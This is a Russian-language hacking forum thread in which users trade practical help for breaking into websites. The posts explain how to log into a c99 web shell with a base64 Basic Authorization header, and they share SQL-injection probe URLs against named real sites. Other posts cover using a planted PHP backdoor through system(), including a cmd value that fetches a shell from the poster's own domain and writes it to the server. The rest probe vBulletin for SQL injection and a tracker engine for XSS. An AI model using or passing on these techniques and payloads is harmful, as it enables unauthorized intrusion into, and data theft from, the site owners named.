пока кроме тебя я накроманов не вижу. у c99 шелла Basic авторизация! какой нахъ get?! если у тебя не появляется форма авторизации, значит ты идиот отснифай заголовки и передай скрипту твой логин и пароль в base64 в формате логин:пароль. в твоём случае это будет Mjoy==
Откуда я могу знать какая у него авторизация, единственное что он у меня пишет это c99madshell v.2.0 madnet edition: access denied в самом низу страницы мелкими буквами. Поподробнее распиши, как снифать и куда Mjoy== писать)))и кстати в base64 Mg== это цифра 2 почему Mjoy==?
1) попробуй сначала открыть шелл в другом браузере. если не помогает установи плагин Tamper Data для FF(что, как, куда - гугл в помощь) и в поле Authorization напиши Basic Mjoy== 2) потому что кодируется не отдельно каждый символ а всё вместе.
На странице http://www.romauno.tv/page.aspx?ln=it&id=35' возникает ошибка: Server Error in '/' Application. Code: <html> <head> <title>Input string was not in a correct format.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Lucida Console";font-size: .9em} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } </style> </head> <body bgcolor="white"> <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1> <h2> <i>Input string was not in a correct format.</i> </h2></span> <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif "> <b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. <br><br> <b> Exception Details: </b>System.FormatException: Input string was not in a correct format.<br><br> <b>Source Error:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre> Line 16: void Page_Load(object s, EventArgs e) { Line 17: language = CMS.GetActiveLanguage(Page); <font color=red>Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]); </font>Line 19: Line 20: if (pageId>0) {</pre></code> </td> </tr> </table> <br> <b> Source File: </b> d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx<b> Line: </b> 18 <br><br> <b>Stack Trace:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre> [FormatException: Input string was not in a correct format.] System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471479 System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119 System.Int32.Parse(String s) +23 ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:18 System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14 System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +50 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627 </pre></code> </td> </tr> </table> <br> <hr width=100% size=1 color=silver> <b>Version Information:</b> Microsoft .NET Framework Version:2.0.50727.3615; ASP.NET Version:2.0.50727.3618 </font> </body> </html> <!-- [FormatException]: Input string was not in a correct format. at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) at System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) at System.Int32.Parse(String s) at ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:line 18 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) [HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown. at System.Web.UI.Page.HandleError(Exception e) at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest() at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) at System.Web.UI.Page.ProcessRequest(HttpContext context) at ASP.page_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\0653116a\fb17cb24\App_Web_jdt6mnpm.6.cs:line 0 at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) --><!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.--> - это как то можно использовать, кроме раскрытия путей для эксплуатации других уязвимостей? Пишу sql injection сканер, есть ли тут уязвимость или просто ошибка: http://www.kolprint.co.il/info.asp?m=1307952780' http://www.portaldenoticias.com/imagenes/tag/El-Joven-Manos-de-Tijera?page=%275 заранее благодарен за любой ответ.
Да, для этого существуют MsSQL Dump'ер. Code: Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]); Никак, обычная ошибка типа при передаче параметра в функцию.
LiveHttpHeaders в помощь. Отправляешь POST запрос и заходишь в шелл. Чтобы узнать что именно отправлять смотри исходники.
Если возникает ошибка типа: An error has occurred: Incorrect syntax near '''. Expected end-of-file, ')', ';', '>', OR, AND, IS, IS_NOT, ORDER_BY. SQLSTATE=42000 Можно ли это как-то использовать?!
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код: Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте. А как дальше? Что и где выполнять?
semafor Можно почитать справку по функции http://ru.php.net/manual/ru/function.system.php > Функция system (). Вызывает команду операционной системы, выводит результат выполнения на экран и возвращает последнюю строку вывода.
так я вижу содержание каталога logs. А как залить туда шелл? Пробую site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php я на хост залил шелл и переименовал его в readme.txt Но так ничего не выходит. Что неправильно делаю?
при попытке сделать sql inj в vBulletin 4.1.2(форум с капчей), когда посылаю любой запрос(допустим на таблицы), вылезает что я неправильно ввел капчу, хотя при указании запроса в строку Code: descending&humanverify%5Binput%5D=число вписываю правильный ответ
на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?
Доброго времени суток. Помогите разобраться пожалуйста. Как можно использовать это - http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='&password=1